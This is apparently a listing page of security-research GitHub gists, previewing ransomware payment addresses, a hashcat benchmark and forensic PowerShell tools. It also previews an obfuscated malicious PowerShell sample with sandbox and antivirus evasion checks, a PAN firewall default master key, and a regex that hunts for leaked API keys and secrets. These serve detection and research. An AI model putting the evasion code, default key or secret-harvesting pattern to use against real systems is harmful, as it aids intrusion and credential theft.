ℹ️ This was duplicated to this blog for readability and reference
The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.
brokensound77
/ RMM-detection.md
Last active
December 5, 2025 19:33
Detection Engineering: RMM analysis
cablej
/ ESXi ransomware payment addresses
Last active
February 26, 2023 22:32
A list of ESXi ransomware payment addresses from https://ransomwhe.re/, collected from Censys and Shodan.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 15m7FP7U4kDJhAVtjjUdUB8WYswpf7Dtho | |
| 1Nm2TMEFEdyb2BP6tLyuREoKECztibuK6P | |
| 1LJYrTxrQA5pFRRg2bSyJLT6MGezmMBVfX | |
| 1EiCssanXmavzjtffYHzK6aVeQHngUxX1s | |
| 1H65AnxCg7mT4rTZmRzH8cxENk1N12rhkZ | |
| 1CVbdRQQ3TeWaPWqARKP9wvAEPvavJDrKo | |
| 1B9APV4ARm26MUW74ZcGNQE9hBHM5XGPbg | |
| 14u8xH6KdJFoTP93Lep9tpb1KQQvshQaAj | |
| 145V8AXLZpFv1ABVEsMYFsGpaZPwgKNZbf | |
| 1LGBP4iwrwv3GxybQ5QZJ19M3MAP76cw6U |
LeeHolmes
/ Get-TwitterThread.ps1
Created
November 15, 2022 17:57
Recover your Twitter threads from your Twitter export data
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length) | |
| $tweets = $tweetJson | ConvertFrom-Json | |
| $currentThread = "" | |
| foreach($currentTweetJson in $tweets) | |
| { | |
| $currentTweet = $currentTweetJson.tweet | |
| if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes") | |
| { |
Chick3nman
/ RTX_4090_v6.2.6.Benchmark
Created
October 14, 2022 00:07
Hashcat v6.2.6 benchmark on the Nvidia RTX 4090
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NVIDIA Driver Version: 522.25 CUDA Version: 11.8 | |
| Credit: blazer | |
| For benchmarking the card and allowing me to release the benchmarks here | |
| The hashcat installation used includes a change to the tuning ALIAS.hctune file to include the RTX 4090 as "ALIAS_nv_sm50_or_higher". | |
| The "Kernel exec timeout" warning is cosmetic and does not affect the speed of any of the benchmarked modes. | |
| Benchmark was run at stock clocks on an Asus Strix 4090. | |
jstrosch
/ gist:352b309a576a1654c6588eb9dcba6d9d
Created
September 30, 2022 18:41
Obfuscated script found at https://thevalueofamoment.com/wp-content/plugins/maintenance/images/
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN" | |
| if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit} | |
| if (${SCR`IP`TP`ATh} -match "avg") {exit} | |
| if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit} | |
| if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit} | |
| if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit} | |
| if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit} | |
| if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit} |
rqu1
/ checkmk.py
Last active
August 4, 2024 16:42
check if a PAN firewall is using the default master key when globalprotect is enabled
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from hashlib import md5, sha1 | |
| from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes | |
| from cryptography.hazmat.backends import default_backend | |
| from base64 import b64encode, b64decode | |
| import sys, time | |
| import requests | |
| DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8' | |
| class PanCrypt(): |
h4x0r-dz
/ Generic keys
Created
May 5, 2022 09:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |
theevilbit
/ get_apple_oss.sh
Last active
December 9, 2025 02:07
Download All Apple OSS Tarballs from Github
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/zsh | |
| : ' | |
| You need a personal access token for GitHub to avoid hitting the rate limit. Refer to the docs: | |
| https://docs.github.com/en/rest/guides/getting-started-with-the-rest-api | |
| https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/creating-a-personal-access-token | |
| ' | |
| APPLE_OSS_DIR="all_apple_oss_archives" | |
| APPLE_OSS_REPO_FILE="all_apple_oss_repo_names.txt" |
blotus
/ log4j_exploitation_attempts_crowdsec.md
Last active
December 29, 2023 12:24
IPs exploiting the log4j2 CVE-2021-44228 detected by the crowdsec community
This list is no longer updated, thus the information is no longer reliable.
You can see the latest version (from october 2022) here
vikas891
/ ExtractAllScripts.ps1
Last active
July 16, 2024 19:32
A PowerShell script to re-construct a suspicious .PS1 from script-blocks recorded in Event ID 4104
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Usage: | |
| # | |
| #NOTE: The script expects an argument which is the full File Path of the EVTX file. | |
| # | |
| #C:\>ExtractAllScripts.ps1 | |
| #The default behavior of the script is to assimilate and extract every script/command to disk. | |
| # | |
| #C:\ExtractAllScripts -List | |
| #This will only list Script Block IDs with associated Script Names(if logged.) | |
| # |